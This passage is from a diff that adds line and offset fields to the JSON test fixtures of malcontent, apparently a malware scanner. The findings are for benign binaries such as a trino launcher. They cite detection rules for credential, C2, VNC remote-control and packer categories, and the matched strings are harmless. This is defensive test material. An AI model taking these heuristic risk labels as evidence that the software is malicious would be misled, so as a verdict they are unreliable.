                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http-request.yara#http_request",
@@ -1093,6 +1426,10 @@
                         "vnc",
                         "VNC"
                     ],
+                    "StartingLine": 2138,
+                    "EndingLine": 11050,
+                    "StartingOffset": 141,
+                    "EndingOffset": 315,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/remote_control/vnc.yara#vnc_elf_subtle",
@@ -1104,6 +1441,10 @@
                     "MatchStrings": [
                         "http://upx.sf.net"
                     ],
+                    "StartingLine": 11860,
+                    "EndingLine": 11860,
+                    "StartingOffset": 59,
+                    "EndingOffset": 75,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#http_url",

--- a/tests/linux/clean/trino.linux-amd64.launcher.json
+++ b/tests/linux/clean/trino.linux-amd64.launcher.json
@@ -51,6 +51,10 @@
                         "GetRandom",
                         "getRandom"
                     ],
+                    "StartingLine": 2800,
+                    "EndingLine": 15965,
+                    "StartingOffset": 9111,
+                    "EndingOffset": 437,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/random_behavior.yara#random",
@@ -67,6 +71,10 @@
                         "xIp",
                         "IP"
                     ],
+                    "StartingLine": 62,
+                    "EndingLine": 19762,
+                    "StartingOffset": 99,
+                    "EndingOffset": 528,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention",
@@ -78,6 +86,10 @@
                     "MatchStrings": [
                         "http://AvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaavx512fnil"
                     ],
+                    "StartingLine": 3632,
+                    "EndingLine": 3632,
+                    "StartingOffset": 371,
+                    "EndingOffset": 562,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url",
@@ -93,6 +105,10 @@
                         "amd64",
                         "x86"
                     ],
+                    "StartingLine": 3626,
+                    "EndingLine": 15956,
+                    "StartingOffset": 62,
+                    "EndingOffset": 12,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref",
@@ -106,6 +122,10 @@
                         "darwin",
                         "linux"
                     ],
+                    "StartingLine": 3626,
+                    "EndingLine": 15955,
+                    "StartingOffset": 57,
+                    "EndingOffset": 15,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref",
@@ -117,6 +137,10 @@
                     "MatchStrings": [
                         "archive/zip"
                     ],
+                    "StartingLine": 3639,
+                    "EndingLine": 3639,
+                    "StartingOffset": 1001,
+                    "EndingOffset": 1011,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip",
@@ -129,6 +153,10 @@
                         "UserPassword",
                         "passwordSet"
                     ],
+                    "StartingLine": 2800,
+                    "EndingLine": 5343,
+                    "StartingOffset": 14053,
+                    "EndingOffset": 119268,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password",
@@ -140,6 +168,9 @@
                     "MatchStrings": [
                         "privateKey"
                     ],
+                    "StartingLine": 3036,
+                    "EndingLine": 3055,
+                    "EndingOffset": 11652,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssl/private_key.yara#private_key_val",
@@ -151,6 +182,10 @@
                     "MatchStrings": [
                         "crypto/aes"
                     ],
+                    "StartingLine": 5343,
+                    "EndingLine": 5349,
+                    "StartingOffset": 90139,
+                    "EndingOffset": 29817,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes",
@@ -162,6 +197,10 @@
                     "MatchStrings": [
                         "crypto/ecdsa"
                     ],
+                    "StartingLine": 5343,
+                    "EndingLine": 5349,
+                    "StartingOffset": 94179,
+                    "EndingOffset": 32325,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/ecdsa.yara#crypto_ecdsa",
@@ -174,6 +213,10 @@
                         "PublicKey",
                         "publicKey"
                     ],
+                    "StartingLine": 2800,
+                    "EndingLine": 3068,
+                    "StartingOffset": 17089,
+                    "EndingOffset": 432,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/public_key.yara#public_key",
@@ -186,6 +229,10 @@
                         "$cmp_e_x_256",
                         "$cmp_r_x_256"
                     ],
+                    "StartingLine": 462,
+                    "EndingLine": 2555,
+                    "StartingOffset": 30,
+                    "EndingOffset": 160,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/rc4.yara#rc4_ksa",
@@ -198,6 +245,9 @@
                     "MatchStrings": [
                         "crypto/tls"
                     ],
+                    "StartingLine": 2998,
+                    "EndingLine": 5349,
+                    "EndingOffset": 42178,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/tls.yara#tls",
@@ -209,6 +259,10 @@
                     "MatchStrings": [
                         "gzip"
                     ],
+                    "StartingLine": 5343,
+                    "EndingLine": 5349,
+                    "StartingOffset": 124017,
+                    "EndingOffset": 43786,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/gzip.yara#gzip",
@@ -221,6 +275,10 @@
                     "MatchStrings": [
                         "base64"
                     ],
+                    "StartingLine": 3055,
+                    "EndingLine": 5349,
+                    "StartingOffset": 2232,
+                    "EndingOffset": 33408,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64",
@@ -232,6 +290,10 @@
                     "MatchStrings": [
                         "nproc"
                     ],
+                    "StartingLine": 3642,
+                    "EndingLine": 3662,
+                    "StartingOffset": 266,
+                    "EndingOffset": 2835,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/cpu.yara#processor_count",
@@ -244,6 +306,10 @@
                     "MatchStrings": [
                         "/proc/sys/kernel/hostname"
                     ],
+                    "StartingLine": 3662,
+                    "EndingLine": 3662,
+                    "StartingOffset": 25,
+                    "EndingOffset": 49,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname",
@@ -256,6 +322,10 @@
                     "MatchStrings": [
                         "syscall.Uname"
                     ],
+                    "StartingLine": 5343,
+                    "EndingLine": 5343,
+                    "StartingOffset": 71407,
+                    "EndingOffset": 71419,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname",
@@ -269,6 +339,10 @@
                         "CombinedOutput",
                         "exec"
                     ],
+                    "StartingLine": 2643,
+                    "EndingLine": 5349,
+                    "StartingOffset": 3,
+                    "EndingOffset": 51508,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/pipe.yara#popen_go",
@@ -283,6 +357,9 @@
                         "pluginversion",
                         "pluginpath"
                     ],
+                    "StartingLine": 2909,
+                    "EndingLine": 3685,
+                    "EndingOffset": 666,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/plugin/plugin.yara#plugin",
@@ -295,6 +372,10 @@
                         ").CombinedOutput",
                         "exec.(*Cmd).Run"
                     ],
+                    "StartingLine": 5343,
+                    "EndingLine": 5343,
+                    "StartingOffset": 141153,
+                    "EndingOffset": 141673,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#exec_cmd_run",
@@ -306,6 +387,10 @@
                     "MatchStrings": [
                         "mkdir"
                     ],
+                    "StartingLine": 3626,
+                    "EndingLine": 3626,
+                    "StartingOffset": 97,
+                    "EndingOffset": 101,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir",
@@ -318,6 +403,10 @@
                     "MatchStrings": [
                         "Rmdir"
                     ],
+                    "StartingLine": 5343,
+                    "EndingLine": 5343,
+                    "StartingOffset": 80170,
+                    "EndingOffset": 80174,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-remove.yara#rmdir",
@@ -329,6 +418,10 @@
                     "MatchStrings": [
                         "unlinkat"
                     ],
+                    "StartingLine": 5343,
+                    "EndingLine": 5343,
+                    "StartingOffset": 71257,
+                    "EndingOffset": 71264,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#unlink",
@@ -341,6 +434,10 @@
                     "MatchStrings": [
                         "openFile"
                     ],
+                    "StartingLine": 5343,
+                    "EndingLine": 5343,
+                    "StartingOffset": 79906,
+                    "EndingOffset": 79930,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-open.yara#java_open",
@@ -353,6 +450,10 @@
                         "os.(*File).Read",
                         "ReadFile"
                     ],
+                    "StartingLine": 5343,
+                    "EndingLine": 5343,
+                    "StartingOffset": 79323,
+                    "EndingOffset": 143161,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-read.yara#go_file_read",
@@ -364,6 +465,10 @@
                     "MatchStrings": [
                         "readlinkat"
                     ],
+                    "StartingLine": 5343,
+                    "EndingLine": 5343,
+                    "StartingOffset": 71220,
+                    "EndingOffset": 80230,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink",
@@ -376,6 +481,10 @@
                     "MatchStrings": [
                         "flock"
                     ],
+                    "StartingLine": 3053,
+                    "EndingLine": 15947,
+                    "StartingOffset": 3905,
+                    "EndingOffset": 31,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/lock-update.yara#flock",
@@ -395,6 +504,10 @@
                         "/etc/mime.types",
                         "/etc/zoneinfo"
                     ],
+                    "StartingLine": 3638,
+                    "EndingLine": 3662,
+                    "StartingOffset": 470,
+                    "EndingOffset": 2195,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path",
@@ -406,6 +519,10 @@
                     "MatchStrings": [
                         "/etc/hosts"
                     ],
+                    "StartingLine": 3638,
+                    "EndingLine": 3638,
+                    "StartingOffset": 470,
+                    "EndingOffset": 479,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc-hosts.yara#etc_hosts",
@@ -417,6 +534,10 @@
                     "MatchStrings": [
                         "/etc/resolv.conf"
                     ],
+                    "StartingLine": 3651,
+                    "EndingLine": 3651,
+                    "StartingOffset": 192,
+                    "EndingOffset": 207,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc-resolv.conf.yara#etc_resolv_conf",
@@ -445,6 +566,10 @@
                         "/Users/martin/go/pkg/mod/golang.org/x/text",
                         "/Users/martin/go/pkg/mod/golang.org/x/sys"
                     ],
+                    "StartingLine": 5093,
+                    "EndingLine": 5349,
+                    "StartingOffset": 228,
+                    "EndingOffset": 51467,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/users.yara#home_path_users",
@@ -458,6 +583,10 @@
                         "/var/log/launcher.log",
                         "/var/log/server.log"
                     ],
+                    "StartingLine": 3672,
+                    "EndingLine": 3684,
+                    "StartingOffset": 3012,
+                    "EndingOffset": 412,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var.yara#var_path",
@@ -469,6 +598,10 @@
                     "MatchStrings": [
                         "Chown"
                     ],
+                    "StartingLine": 2800,
+                    "EndingLine": 2800,
+                    "StartingOffset": 5116,
+                    "EndingOffset": 5120,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-chown.yara#Chown",
@@ -481,6 +614,10 @@
                         "chmod",
                         "Chmod"
                     ],
+                    "StartingLine": 2800,
+                    "EndingLine": 2800,
+                    "StartingOffset": 5109,
+                    "EndingOffset": 5134,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-modify.yara#chmod",
@@ -495,6 +632,10 @@
                         "dnsmessage",
                         "SetEDNS0"
                     ],
+                    "StartingLine": 3053,
+                    "EndingLine": 5349,
+                    "StartingOffset": 7391,
+                    "EndingOffset": 34730,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns.yara#go_dns_refs",
@@ -506,6 +647,10 @@
                     "MatchStrings": [
                         "CNAMEResource"
                     ],
+                    "StartingLine": 3053,
+                    "EndingLine": 5343,
+                    "StartingOffset": 7391,
+                    "EndingOffset": 106655,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-servers.yara#go_dns_refs_local",
@@ -518,6 +663,10 @@
                         "dns",
                         "TXT"
                     ],
+                    "StartingLine": 1819,
+                    "EndingLine": 5349,
+                    "StartingOffset": 1802,
+                    "EndingOffset": 36636,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-txt.yara#dns_txt",
@@ -530,6 +679,10 @@
                         "http",
                         "HTTP"
                     ],
+                    "StartingLine": 2373,
+                    "EndingLine": 5349,
+                    "StartingOffset": 651,
+                    "EndingOffset": 47845,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http.yara#http",
@@ -541,6 +694,10 @@
                     "MatchStrings": [
                         "www-authenticate"
                     ],
+                    "StartingLine": 3651,
+                    "EndingLine": 3651,
+                    "StartingOffset": 64,
+                    "EndingOffset": 79,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/auth.yara#http_auth",
@@ -554,6 +711,10 @@
                         "HTTP",
                         "http"
                     ],
+                    "StartingLine": 2373,
+                    "EndingLine": 5349,
+                    "StartingOffset": 625,
+                    "EndingOffset": 47845,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post",
@@ -566,6 +727,10 @@
                         "HTTPS_PROXY",
                         "HTTP_PROXY"
                     ],
+                    "StartingLine": 3638,
+                    "EndingLine": 3686,
+                    "StartingOffset": 530,
+                    "EndingOffset": 25,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/proxy.yara#http_proxy_env",
@@ -578,6 +743,10 @@
                     "MatchStrings": [
                         "User-Agent"
                     ],
+                    "StartingLine": 3638,
+                    "EndingLine": 3638,
+                    "StartingOffset": 150,
+                    "EndingOffset": 159,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http-request.yara#http_request",
@@ -589,6 +758,10 @@
                     "MatchStrings": [
                         "ipAddr"
                     ],
+                    "StartingLine": 5343,
+                    "EndingLine": 5343,
+                    "StartingOffset": 112730,
+                    "EndingOffset": 112735,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/addr.yara#ip_addr",
@@ -600,6 +773,10 @@
                     "MatchStrings": [
                         "hostunknown port"
                     ],
+                    "StartingLine": 3641,
+                    "EndingLine": 3641,
+                    "StartingOffset": 296,
+                    "EndingOffset": 311,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/host_port.yara#host_port_ref",
@@ -611,6 +788,10 @@
                     "MatchStrings": [
                         "IsLinkLocalUnicast"
                     ],
+                    "StartingLine": 3055,
+                    "EndingLine": 5343,
+                    "StartingOffset": 7603,
+                    "EndingOffset": 98334,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#ip_go",
@@ -622,6 +803,10 @@
                     "MatchStrings": [
                         "LookupIP"
                     ],
+                    "StartingLine": 2800,
+                    "EndingLine": 5343,
+                    "StartingOffset": 14483,
+                    "EndingOffset": 116428,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-resolve.yara#gethostbyaddr",
@@ -634,6 +819,9 @@
                     "MatchStrings": [
                         "LookupHost"
                     ],
+                    "StartingLine": 3021,
+                    "EndingLine": 3021,
+                    "EndingOffset": 9,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostname-resolve.yara#go_resolve",
@@ -646,6 +834,10 @@
                         "socket",
                         "accept"
                     ],
+                    "StartingLine": 2800,
+                    "EndingLine": 5343,
+                    "StartingOffset": 6495,
+                    "EndingOffset": 114907,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen",
@@ -657,6 +849,10 @@
                     "MatchStrings": [
                         "getsockname"
                     ],
+                    "StartingLine": 5343,
+                    "EndingLine": 5343,
+                    "StartingOffset": 71700,
+                    "EndingOffset": 71710,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname",
@@ -669,6 +865,10 @@
                     "MatchStrings": [
                         "SetsockoptInt"
                     ],
+                    "StartingLine": 3053,
+                    "EndingLine": 5343,
+                    "StartingOffset": 6551,
+                    "EndingOffset": 77414,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-options-set.yara#go_setsockopt_int",
@@ -680,6 +880,10 @@
                     "MatchStrings": [
                         "getpeername"
                     ],
+                    "StartingLine": 5343,
+                    "EndingLine": 5343,
+                    "StartingOffset": 71680,
+                    "EndingOffset": 71690,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername",
@@ -692,6 +896,10 @@
                     "MatchStrings": [
                         "recvfrom"
                     ],
+                    "StartingLine": 5343,
+                    "EndingLine": 5343,
+                    "StartingOffset": 71720,
+                    "EndingOffset": 71727,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recvmsg",
@@ -704,6 +912,10 @@
                     "MatchStrings": [
                         "sendto"
                     ],
+                    "StartingLine": 5343,
+                    "EndingLine": 5343,
+                    "StartingOffset": 71737,
+                    "EndingOffset": 71742,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#sendmsg",
@@ -716,6 +928,10 @@
                     "MatchStrings": [
                         "dialTCP"
                     ],
+                    "StartingLine": 2800,
+                    "EndingLine": 5343,
+                    "StartingOffset": 12025,
+                    "EndingOffset": 115488,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/connect.yara#connect_tcp",
@@ -727,6 +943,10 @@
                     "MatchStrings": [
                         "ReadFromUDP"
                     ],
+                    "StartingLine": 3053,
+                    "EndingLine": 3055,
+                    "StartingOffset": 2248,
+                    "EndingOffset": 9062,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/udp/udp-receive.yara#udp_listen",
@@ -739,6 +959,10 @@
                         "WriteMsgUDP",
                         "DialUDP"
                     ],
+                    "StartingLine": 3053,
+                    "EndingLine": 5343,
+                    "StartingOffset": 2261,
+                    "EndingOffset": 115844,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/udp/udp-send.yara#udp_send",
@@ -750,6 +974,10 @@
                     "MatchStrings": [
                         "http://AvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKa"
                     ],
+                    "StartingLine": 3632,
+                    "EndingLine": 3632,
+                    "StartingOffset": 371,
+                    "EndingOffset": 442,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#http_url",
@@ -761,6 +989,9 @@
                     "MatchStrings": [
                         "RequestURI"
                     ],
+                    "StartingLine": 2977,
+                    "EndingLine": 2977,
+                    "EndingOffset": 9,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/parse.yara#url_handle",
@@ -772,6 +1003,10 @@
                     "MatchStrings": [
                         "net/url"
                     ],
+                    "StartingLine": 2800,
+                    "EndingLine": 5349,
+                    "StartingOffset": 11899,
+                    "EndingOffset": 39694,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/request.yara#requests_urls",
@@ -784,6 +1019,10 @@
                         "syscall.Sendfile",
                         "sendfile"
                     ],
+                    "StartingLine": 5343,
+                    "EndingLine": 5349,
+                    "StartingOffset": 71552,
+                    "EndingOffset": 38300,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/sendfile.yara#sendfile",
@@ -796,6 +1035,10 @@
                     "MatchStrings": [
                         "netlink"
                     ],
+                    "StartingLine": 5349,
+                    "EndingLine": 5349,
+                    "StartingOffset": 20214,
+                    "EndingOffset": 20220,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/netlink.yara#netlink",
@@ -807,6 +1050,10 @@
                     "MatchStrings": [
                         "daemon"
                     ],
+                    "StartingLine": 3682,
+                    "EndingLine": 3684,
+                    "StartingOffset": 526,
+                    "EndingOffset": 428,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/daemon/daemon.yara#daemon",
@@ -821,6 +1068,10 @@
                         "LockablePidFile",
                         "pidFile"
                     ],
+                    "StartingLine": 2800,
+                    "EndingLine": 5343,
+                    "StartingOffset": 10027,
+                    "EndingOffset": 144219,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/pid_file.yara#pid_file",
@@ -832,6 +1083,10 @@
                     "MatchStrings": [
                         "setgroups"
                     ],
+                    "StartingLine": 3636,
+                    "EndingLine": 3636,
+                    "StartingOffset": 679,
+                    "EndingOffset": 687,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups",
@@ -856,6 +1111,10 @@
                     "MatchStrings": [
                         "urandomC"
                     ],
+                    "StartingLine": 9618,
+                    "EndingLine": 9618,
+                    "StartingOffset": 229,
+                    "EndingOffset": 236,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/random_behavior.yara#random",
@@ -869,6 +1128,10 @@
                         "executable packer",
                         "UPX!"
                     ],
+                    "StartingLine": 1,
+                    "EndingLine": 10469,
+                    "StartingOffset": 236,
+                    "EndingOffset": 120,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/packer/upx.yara#upx",
@@ -882,6 +1145,10 @@
                         "amd64",
                         "x86"
                     ],
+                    "StartingLine": 4856,
+                    "EndingLine": 10450,
+                    "StartingOffset": 64,
+                    "EndingOffset": 65,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref",
@@ -893,6 +1160,10 @@
                     "MatchStrings": [
                         "AES"
                     ],
+                    "StartingLine": 4899,
+                    "EndingLine": 4899,
+                    "StartingOffset": 1707,
+                    "EndingOffset": 1709,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes",
@@ -904,6 +1175,10 @@
                     "MatchStrings": [
                         "gzip"
                     ],
+                    "StartingLine": 5023,
+                    "EndingLine": 5023,
+                    "StartingOffset": 290,
+                    "EndingOffset": 293,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/gzip.yara#gzip",
@@ -916,6 +1191,10 @@
                     "MatchStrings": [
                         "/proc/self/exe"
                     ],
+                    "StartingLine": 10453,
+                    "EndingLine": 10453,
+                    "StartingOffset": 12,
+                    "EndingOffset": 25,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-exe.yara#proc_self_exe",
@@ -928,6 +1207,10 @@
                         "dns",
                         "TXT"
                     ],
+                    "StartingLine": 2513,
+                    "EndingLine": 3909,
+                    "StartingOffset": 68,
+                    "EndingOffset": 111,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-txt.yara#dns_txt",
@@ -940,6 +1223,10 @@
                         "http",
                         "HTTP"
                     ],
+                    "StartingLine": 3518,
+                    "EndingLine": 10450,
+                    "StartingOffset": 181,
+                    "EndingOffset": 62,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http.yara#http",
@@ -953,6 +1240,10 @@
                         "HTTP",
                         "http"
                     ],
+                    "StartingLine": 3001,
+                    "EndingLine": 10450,
+                    "StartingOffset": 74,
+                    "EndingOffset": 62,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post",
@@ -964,6 +1255,10 @@
                     "MatchStrings": [
                         "http://upx.sf.net"
                     ],
+                    "StartingLine": 10450,
+                    "EndingLine": 10450,
+                    "StartingOffset": 59,
+                    "EndingOffset": 75,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#http_url",
@@ -984,6 +1279,10 @@
                         "kUNKNOWN:$",
                         "lmRnTEOIt"
                     ],
+                    "StartingLine": 3458,
+                    "EndingLine": 10403,
+                    "StartingOffset": 306,
+                    "EndingOffset": 362,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
